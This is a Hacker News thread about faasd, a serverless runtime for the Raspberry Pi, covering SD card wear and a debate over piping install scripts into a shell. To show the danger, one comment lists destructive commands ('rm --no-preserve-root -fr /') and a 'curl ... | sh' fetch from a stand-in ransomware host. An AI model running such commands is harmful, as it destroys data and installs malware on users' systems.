Faasd – Lightweight Serverless for Raspberry Pi (alexellis.io)
75 points by alexellisuk on Oct 24, 2020 | 47 comments


Ehm, what's the point in running serverless on a (single) server? How is that different from writing an API with something like express or flask?


Read the introduction and conclusion for use-cases. Self-hosted FaaS gives a "serverless", hands-off experience, whilst making it trivial to package and operate Flask, Go, Node, Express, C#, and so on. Try it, see what you think.
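
For a flavour of the workflow, it's roughly this (a sketch from memory; the function name, template, and file names are just examples and may differ by version):

    faas-cli new hello --lang python3   # scaffold a function from a template
    # edit hello/handler.py, then build, push and deploy in one step:
    faas-cli up -f hello.yml
    # invoke it through the local gateway:
    curl http://127.0.0.1:8080/function/hello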


You don't have to keep it running in memory all the time.

If you have a small device with limited resources, maybe you'd rather have it ready to do many different things for you infrequently, as opposed to doing fewer things continuously.


Isn't that the OS's job?

It was my understanding that the kernel would put idle processes to sleep, and even page the memory they use out from RAM to disk, waking them up when there is some input for them.


How would the OS know that web server process is "idle" vs "ready to accept requests"?


Not sure; socket binding?


I was taught in school "The job of an operating system is to share resources" so yes.


Ok, that's a fair point. So maybe some serverless tech can be more specialised and thus better than the Linux kernel at managing, effectively, virtual memory.

If everything is written in-house I still think a plain API would be simpler, but I guess this way some functions can be supplied by vendors or open source, which currently cannot be composed into, e.g., a Flask API. So it would be nice to have a way of composing APIs from simple functions supplied in packages. I guess that is what serverless is.


It's a bad idea to run Docker on a Raspberry Pi, mostly because it will eat the memory card: the card will fail much sooner because of all the I/O.

I know from experience :)


In case you aren't aware, there are plenty of tutorials out there that help you get a raspberry pi to boot from USB, which allows you to use any HD there is.

Moreover, nothing stops you from getting everything to run on a RAM drive. There are raspberry pis with 8GB of RAM on the market right now.
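
For instance, a minimal sketch (the mount point and size are arbitrary):

    sudo mkdir -p /mnt/ramdisk
    sudo mount -t tmpfs -o size=1G tmpfs /mnt/ramdisk   # backed by RAM, never touches the SD card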

Having said that, an official Raspberry Pi SD card with 16GB sells for $10. Not exactly something that pushes you into bankruptcy.


This isn't Docker, it's containerd, and once deployed it's mostly read-only. You can also mount a USB hard drive or NVMe over USB if you want.

Personally, I netboot my RPis, and faasd works equally well on the public cloud.


> it will be faulty way sooner because lots of I/O

It all makes sense now. One of my first computing projects was building a small cluster computer with Raspberry Pi boards. I noticed that the SD cards started to fail oddly fast, most likely because they were all either swarm nodes or a swarm controller.


Just map /var/lib/docker to another storage location, then.
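
Something like this, assuming I remember the knob correctly ("data-root" is the documented daemon.json option; the path is just an example):

    echo '{ "data-root": "/mnt/usb/docker" }' | sudo tee /etc/docker/daemon.json
    sudo systemctl restart docker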


What is it about Docker that makes it so much worse?

Been running Home Assistant via Docker (Hassio) 24/7 for over two years now, off the same SD card on my Raspberry Pi 3B, no issues so far.


The difference might be (besides card quality) the amount of free space on the card. If you are churning through the same 500MB with your temporary files, you will wear the card out much faster than if you spread the same I/O over 5GB of empty space.


A lot of RPis are running on non-SD storage or durable SD Cards.


New Raspberry Pi 4s can boot from USB out of the box, as of a month or two ago.


I do agree with you.

However, I think Pi SD cards get a bad rap because of marginal power supplies (very common before the Pi 4) and unclean shutdowns.

I had a card become corrupted once; reformatting it did the trick and it has been fine since.


I had a Pi which was very unstable. I measured the USB cable, supposedly a charging cable, and it had 1 Ohm of resistance! Replaced it with a proper one and it has been rock solid since.
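
For perspective: at a typical 2A draw, Ohm's law (V = I x R) gives a 2V drop across the cable alone, so the board would see roughly 3V instead of 5V. No wonder it was unstable.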


why is it still acceptable to suggest something like

  curl -sLfS https://cli.openfaas.com | sudo sh

?


Can you explain why this is so unacceptable? Couldn't you inspect the contents at the URL before you execute the command? What I've seen in some cases is running the curl command to download the file and then executing it. I don't see much difference. This is a serious question; I'm not arguing that this is the best way.


You answered the question yourself.

The difference is between inspecting the executed command, and blindly executing something where you have no idea what it's going to do.

For example, maybe the content at the URL is "rm --no-preserve-root -fr /". Or "rm -fr /home/*/Pictures 2>/dev/null". Or "curl https://ransomeware-encryptor.example.com | sh".

No problem if you inspect it first. Lots of unhappiness and heartbreak if you don't.
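
And the careful pattern is cheap, because you inspect and run the same bytes:

    curl -sLfS https://cli.openfaas.com -o install.sh
    less install.sh     # read what it is about to do
    sudo sh install.sh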


Has anyone, in the history of complaining about this type of script, ever run one and had it nuke their computer? What are the odds that the domains, companies, and projects that use this built their online presence just to pwn your computer for the lulz, or that they were compromised by a malicious actor, undetected, at the exact moment you ran the installer, with no one anywhere saying anything?

How about instead we exercise critical thinking, make our own assessment of the risk, and act accordingly? Why would you choose not to pipe a shell script from a site you don't trust, but execute their installer instead?

If you don’t want to pipe it, download it and read it first.


Hey, I use "curl | sh" myself.

But I don't pretend there's no security risk in doing so. Like you advised, I exercise critical thinking, and then I take a risk.

On someone else's production machine, or a container with sensitive data, that risk is too high. On a fun machine in isolation it's fine.

The GPP asks what's the security difference between inspecting and not inspecting the downloaded command.

> or that they have been compromised by a malicious actor without being detected at the same time you run the installer

Installers are compromised quite often by malicious actors. Running an installer is just as dubious as running "curl | sh".

However, replacing an installer with one that looks the same but is actually malicious, is a lot more work than replacing a blind script with one that looks the same but is actually malicious.

And the risk of a malicious blind script going unnoticed is higher than that of a compromised installer whose SHA256 is published alongside the download link, simply because the attacker would need to change two places instead of one. Yes, I do check the hashes of installers when that's possible and there isn't a package manager already doing so. It's a good idea anyway in case of a corrupted download, which I do see from time to time.
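
The check itself is a one-liner (file names here are illustrative):

    sha256sum -c installer.run.sha256   # verifies installer.run against the published checksum file
    sha256sum installer.run             # or print the hash and compare it by eye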


> had it nuke their computer?

Pretty close. Some of them install all sorts of wacky dependencies through non-traditional means: you curl an install script, and then it goes and curls a whole bunch of other stuff.

Massive PITA to track all the changes that it made and uninstall it.

Package managers were made for a reason, and people should use them.
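
With a package manager the cleanup is trivial (package name is just an example):

    dpkg -L some-package           # list every file the package owns
    sudo apt remove some-package   # remove them all in one step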


Since the shell script in question installs OpenFaaS, unless you read all the source code for OpenFaaS too, you still really have no idea whether it's going to do something malicious or not.


What would be cool is a command-line util that you could pipe the script through for a safety inspection.

Something like: curl https://ransomeware-encryptor.example.com | script-checker | sh


    alias script-checker="echo 'echo unsafe'"


A reasonable attacker would serve a different file to curl than to the browser, so you'd inspect something other than what you run, and you wouldn't even have a copy of the file afterwards.


Updated with two other options. These are documented in the existing link, but made clearer because of this comment.


Because it is probably too much work to correctly package the thing for multiple operating systems.


It never was acceptable in polite society, but I find it's a useful signal to indicate what software to avoid.


Good question. I personally find gVisor-like [0] copy & paste installation snippets the most pleasant way:

   (
     set -e
     URL=https://storage.googleapis.com/gvisor/releases/release/latest
     wget ${URL}/runsc ${URL}/runsc.sha512
     sha512sum -c runsc.sha512
     rm -f runsc.sha512
     sudo mv runsc /usr/local/bin
     sudo chmod a+rx /usr/local/bin/runsc
   )
Thanks to the parentheses it runs in a subshell, so it feels like a "one-liner" script and the `set -e` and variables don't leak into your session. Is there any better way to share an installation script?

[0]: https://gvisor.dev/docs/user_guide/install/


Yes, a .deb package. Much easier to UNinstall. That's the biggest problem with these install scripts: they crap all over your entire system, and it's not obvious how to get rid of it all if you decide you don't want it.


Actually, a deb is a way to "distribute" software, not "just" to install something. Let's say I would like to install Docker; in the case of Ubuntu I need to type the following commands:

  (
      sudo apt-get update
      # prerequisites for using an HTTPS apt repository
      sudo apt-get -y install \
          apt-transport-https \
          ca-certificates \
          curl \
          gnupg-agent \
          software-properties-common
      # add Docker's official GPG key and verify its fingerprint
      curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
      sudo apt-key fingerprint 0EBFCD88
      # add the stable repository for this Ubuntu release
      sudo add-apt-repository -y \
          "deb [arch=amd64] https://download.docker.com/linux/ubuntu \
          $(lsb_release -cs) \
          stable"
      sudo apt-get update
      sudo apt-get install -y docker-ce docker-ce-cli containerd.io
  )
How would a `.deb` help you install/uninstall such software? Do you mean embedding some scripts to add the third-party repository and then installing your app?

Even then, how does it actually differ from the script I already suggested in my previous post? It is still about downloading two files (a signature and the packaged application) and installing them (e.g. via dpkg --install).
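
i.e. something roughly like this (the URL and file names are hypothetical):

    wget https://example.com/app_1.0_arm64.deb
    wget https://example.com/app_1.0_arm64.deb.asc
    gpg --verify app_1.0_arm64.deb.asc app_1.0_arm64.deb   # check the detached signature
    sudo dpkg --install app_1.0_arm64.deb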


Why not just:

    sudo apt install docker.io
And for more up-to-date versions, why doesn't Docker create a PPA? At most it should be something like:

    sudo apt-add-repository ppa:docker/docker
    sudo apt install docker
That's how these things were intended to work.


PPAs are just Ubuntu's way of making it easier to create APT repositories. Those steps above are the longer way of achieving the same result without relying on Canonical's infrastructure. The same instructions can also be used, with minor changes, on Debian and Raspbian (and could probably work on most other Debian-based distros).

Those steps cover all the bases for Debian-based distros: adding the signing keys Docker uses for their packages, adding the repository, and then finally installing the packages.


You can just download the .deb files from https://download.docker.com/linux/ubuntu/dists/focal/pool/st... and install them. No need to add another repo.


Erm, no, I think I haven't been clear in my first post. I am not asking how to install an apt package, but how to provide a universal recipe for shipping third-party software as a handy installation script. What you suggest is how to download and install a few debs from a website. When I write such a script, I don't trust the host name "just like that" as you suggest; it could be malformed or point to a totally different host than we would expect.


It installs a single static binary, hardly sprawling all over your system. It's also available in brew, AUR, and a bunch of other places.
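
e.g., if memory serves:

    brew install faas-cli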


Linux package management systems are old enough to purchase alcohol in the United States.


Of course they are, but they are meant for more sophisticated purposes (install, update, reinstall, remove an app, or even purge a program together with its user data, etc.), and all of that logic is usually backed by signature checking and other security-oriented mechanisms. I agree that apt/dnf/pacman/apk/xbps are great, but...

In the case of Ubuntu, in order to install some deb-based software you usually have to bring your own script (this is what I call a "copy & paste installation script") to add the third-party repository that contains the given package.


well, the definition of a linux distribution is a repository + a package manager.

https://en.wikipedia.org/wiki/Linux_distribution

:)


The most surprising thing in this article is that the containerd maintainers don't provide binaries for anything but x86_64!


Yes... working on that one. They don't have e2e testing equipment and don't have a personal interest in it, so they default to not doing anything about it. In the meantime, armhf and arm64 binaries are available here, along with custom build instructions: https://github.com/alexellis/containerd-arm
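
If you want to build it yourself in the meantime, containerd is Go, so a rough sketch is just cross-compiling (the cgo-backed plugins may also need a cross C toolchain or build tags; the repo above has the exact steps):

    git clone https://github.com/containerd/containerd
    cd containerd
    GOARCH=arm64 make binaries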


This should be flagged as 2019 in the title. OpenFaaS has progressed further since then (IIRC there are Docker Compose files for single-node deployments out there).


For those who are commenting without reading the post (I know who you are :))

> The use-cases for Serverless / FaaS are fairly well-known, but you could use faasd at the edge, in a smart-car, as part of an IoT device, for crunching data before uploading samples to the cloud, for webhook receivers/alerting, bots, webservices, API integrations or even providing your own APIs. Compute is compute, and OpenFaaS with containerd makes it easy to both consume and provide.

See also potential use-cases

Bear in mind that faasd is also used in production where users don't want to maintain a Kubernetes cluster, but do want a few APIs, websites, or functions.



